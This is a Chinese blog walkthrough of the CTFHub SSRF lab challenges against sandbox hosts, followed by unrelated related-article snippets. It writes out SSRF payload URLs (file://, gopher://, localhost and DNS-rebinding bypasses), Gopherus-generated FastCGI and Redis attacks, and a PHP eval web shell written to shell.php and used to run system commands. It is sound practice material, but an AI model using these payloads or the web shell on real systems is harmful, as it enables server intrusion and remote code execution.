CTFHub技能树--SSRF攻略

已于 2024-07-24 21:26:40 修改
阅读量601 收藏 10
点赞数 14
文章标签: mysql sql
于 2024-07-24 21:22:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68186313/article/details/140671640
版权

先上通关截图٩( 'ω' )و

一、内网访问

删掉_,使用url参数127.0.0.1/flag.php,页面成功回显flag

http://challenge-ccd8c042f631e05b.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php

二、伪协议读取文件

这里用到的是url=file:///var/www/html/flag.php,用来访问本地计算机中的文件。

http://challenge-4ef696fbcb16ad67.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php

点击"F12"查看控制台,成功找到flag

三、端口扫描

这关需要抓包,打开Burpsuite,

截取到请求包之后发送到Intruder,并设置"狙击手"的攻击方式,开始爆破端口

找到length不同的一个端口并点开查看,成功找到flag

四、Post请求

点击"F12"查看控制台,收获到一个key,保存下来。

<!-- Debug: key=c7abfa899a2ed85064bf0eca2f8afbdb-->

 接下来将你用Burpsuite抓到的数据包进行删减来构造POST请求包

复制并对其进行url编码

 # 编码解码网站

CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码 (hiencode.com)

 将编码的结果复制下来,保存在txt文档中,其中需要将%0A替换成 %0d%0A并且末尾加上%0d%0a

 再次进行URL编码并使用Gopher进行攻击访问,获取Flag

五、上传文件

通过file://伪协议来读取flag.php源代码,源码中需手动添加提交框并提交文件大小大于0的文件并抓包

将抓到的包进行删减,得到如下请求包

将HTTP头部的Host字段修改为127,0.0,1:80,然后就是老操作..url编码再一次在把%0A换成%0D%0A,然后再对url进行第二次编码,最后输入如下,得到flag

http://challenge-2747897a53ffa023.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/_你二次编码后的数据

 六、FastCGI协议

准备一句话木马并构造要执行的终端命令:对一句话木马进行base64编码且写入到名为shell.php的文件中

# 一句话编码

<?php @eval($_POST["cmd"]);?>

# base64编码后

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

 使用Gopherus.工具生成payload:

# kali中执行

python2 gopherus.py --exploit fastcgi

 

 将生成的payload再进行第二次编码即可,访问上传,再输入http://challenge-2747897a53ffa023.sandbox.ctfhub.com:10800/shell.php进行验证

http://challenge-2747897a53ffa023.sandbox.ctfhub.com:10800/shell.php和cmd丢入”中国菜刀工具中“(需要的小伙伴联系笔者),最后成功找到flag

七、Redis协议

使用Gopherus.工具生成payload,完成后,并将以下部分进行一次url编码

访问编码后的数据,最终执行以下命令获取flag

/shell.php?cmd=system('ls /');
/shell.php?cmd=system('cat /flag_1d9b8ddfd9766ee8c6e68b2b7ca0f4fa');

八、URL Bypass

绕过方法

http://challenge-84e69b7c2ebd1414.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

九、数字IP Bypass

绕过方法

http://challenge-84e69b7c2ebd1414.sandbox.ctfhub.com:10800/?url=http://localhost/flag.php

 

十、302跳转 Bypass

绕过方法

http://challenge-2f62627641ef4b27.sandbox.ctfhub.com:10800/?url=localhost/flag.php

 

十一、DNS重绑定 Bypass 

在解析网站上获取解析到内网IP的域名并作访问即可获取其Flag

?url=http://7f000001.7f000002.rbndr.us/flag.php

浅秋沐玖
关注
  • 14
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1024
CTFHub技能树-web-ssrf
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2218
ssrf
CTFHUB--技能树--SSRF全解(上篇)
errorr0
05-11 2183
SSRF技能树
CTFHUB技能树-SSRF-redis协议踩坑
u011250160的博客
01-03 543
在gopherus上面输入命令:python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
31-浅谈SSRF漏洞1
08-03
SSRF(Server-Side Request Forgery)漏洞是一种网络安全问题,主要出现在服务器端,攻击者能够利用此漏洞控制服务器发起请求到特定的内部网络资源。由于这些请求通常源于服务器,它们可以绕过对外网的常规防护,...
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip
04-09
SSRF(Server-Side Request Forgery)前端挡光元件设计中的力学问题研究主要涉及软件开发与硬件工程的交叉领域,特别是在网络安全和机械结构设计方面。SSRF是一种利用服务器发起请求的安全漏洞,通常针对的是服务器...
MYSQL
maoqiwei的博客
07-23 140
1.修改student 表中年龄(sage)字段属性,数据类型由int 改变为smallint 2.为Course表中Cno 课程号字段设置索引,并查看索引 3.为SC表建立按学号(sno)和课程号(cno)组合的升序的主键索引,索引名为SC_INDEX4.创建一视图 stu info,查询全体学生的姓名,性别,课程名,成绩5.删除所有索引
MySQL:SELECT 语句
Zachyy的博客
07-20 386
MySQL 中,可以使用 SELECT语句来查询数据。查询数据是指从数据库中根据需求,使用不同的查询方式来获取不同的数据,是使用频率最高、最重要的操作。
测试开发面试题---MySQL
m0_53302824的博客
07-22 904
索引是数据库管理系统中用于提高数据检索速度的数据结构,它可以帮助快速定位数据不需要扫描全表。提高查询速度;唯一性约束,确保数据不会重复;辅助排序和分组;减少磁盘IO。
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 768
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 488
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
Mysql高价语句
Alone8046的博客
07-22 627
8.子查询:内查询,嵌套查询,selsect语句当中有嵌套了一个select,嵌套的select才是子查询,查询的时候是先执行子查询语句,外部的select再根据子条件的结果进行过滤查找;左连接以左表为基础,接收左表的所有行,以左表的记录和右表的记录进行匹配,匹配左表的所有,以及右表中符合条件的行,不符合的显示null。5.表和列的别名:因为在实际工作中,表的名字和列的名字可能会很长,书写起来不太方便,多次声明表和列时完整的展示太复杂,设置别名可以使书写简化,可读性增加,简洁明了。是多表数据的集合体。
mysql、oracle、db2数据库连接参数
卿本佳人的博客
07-18 391
mysql、oracle、db2数据库连接参数 参数/数据库 driver url Mysql com.mysql.jdbc.Driver 或 com.mysql.cj.jdbc.Driver jdbc:mysql://localhost:3306/数据库名 Oracle oracle.jdbc.driver.OracleDriver jdbc:oracle:thin:@localhost:1521:orcl //orcl为数据库SID DB2 com.ibm.db2.jcc.D
Windows版MySQL5.7解压直用(如何卸载更换位置重新安装)
xzzteach的博客
07-21 293
【代码】Windows版MySQL5.7解压直用(如何卸载更换位置重新安装)
Mysql (五)
最新发布
qq_64410777的博客
07-23 277
以左边的表为基础,接收左表的所有行,以左表的记录与右表的记录进行匹配,匹配左表的所有,以及右表中符合条件的行,不符合的显示null值。表和列的别名 在实际工作中,表和列名可能很长,写起来不方便,如果需要多次声明表和列时,全部展示太复杂,设置别名使书写简化。这里只是判断,结果为空 则不执行 ,如果不为空则执行前面的 结果是7 只要不为空就是7 执行的是count(*)SELECT i.name 姓名,i.score 成绩 from info as i;
ctfhub web技能树302跳转
07-28
CTFHub的Web技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHub的Web技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值